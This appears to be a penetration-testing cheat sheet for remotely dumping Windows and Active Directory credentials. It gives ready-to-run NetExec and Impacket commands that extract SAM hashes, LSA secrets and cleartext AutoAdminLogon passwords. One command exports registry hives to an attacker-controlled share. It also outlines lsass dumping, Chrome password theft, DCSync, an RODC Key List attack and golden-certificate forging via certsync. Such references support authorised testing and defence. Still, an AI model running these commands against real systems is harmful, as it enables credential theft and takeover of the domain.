
Various Python tools (NetExec, Impacket scripts, certsync) to dump credentials remotely.

1) Check RunAsPPL

Check whether RunAsPPL (LSA Protection, HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL) is enabled in the registry. When it is, lsass runs as a Protected Process Light and a plain user-mode dump of its memory is refused, so the lsass route below needs a bypass; the SAM, LSA secrets and remote-registry methods do not read lsass memory and are unaffected.

nxc smb <target> -u user1 -p password -M runasppl

2) Dump credentials remotely

Dump the SAM database of a machine (local accounts' NT hashes; requires local admin rights on the target)

nxc smb <target> -u user1 -p password --sam

Dump the LSA secrets of a machine (machine account password, DPAPI system keys, cached service account passwords, cached domain logons)

nxc smb <target> -u user1 -p password --lsa

Alternatively, with LSA_reg2pdf: run get_pdf on the target, then run get_bootkey on your host to parse the resulting PDF

.\get_pdf.exe 1
python3 get_bootkey.py

Dump through the remote registry. The backup mode makes the target save its SAM, SYSTEM and SECURITY hives to a UNC path, so that share must accept writes from the target (for example an smbserver.py started with a writable share); the query against the WinLogon key looks for AutoAdminLogon credentials stored in clear text (DefaultUserName/DefaultPassword).

reg.py domain.local/user1:password@<target> backup -o '\\<attacker_IP>\share'
reg.py domain.local/user1:password@<target> query -keyName 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon'

Dump with an alternative, more discreet method, regsecrets.py

regsecrets.py domain.local/user1:password@target.domain.local

Dump the lsass process and parse it (blocked when RunAsPPL is enabled unless the protection is bypassed; see 1)

Retrieve passwords saved by Chrome (they are DPAPI-protected, so the relevant DPAPI master keys are needed to decrypt them)

Run a DCSync attack against all users (NT hashes, Kerberos AES keys, etc.). This requires replication rights on the domain (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which Domain Admins and domain controllers hold by default.

DCSync only the NT and LM hashes of a single user

Retrieve NT hashes via a Key List attack (KERB-KEY-LIST-REQ) on an RODC; the RODC's krbtgt key (krbtgt_<id>) is needed to forge the TGT used in the request

Attempt to dump every user's hash, including those in the RODC's Denied list (the DC refuses to reveal accounts that are not allowed to replicate to that RODC, so those attempts fail)

Low-privileged domain credentials are needed in the command for the SAMR user enumeration

Attempt to dump a specific user's hash

Certsync: retrieve the NT hashes of all users with PKINIT (a DCSync alternative that goes through AD CS instead of the replication RPCs; it needs the CA's private key)

Back up the private key and the certificate of the root CA, then forge golden certificates for all the users

Authenticate with each certificate via PKINIT to obtain a TGT, then extract the NT hash with UnPAC-the-hash

Provide the CA .pfx if it has been obtained another way
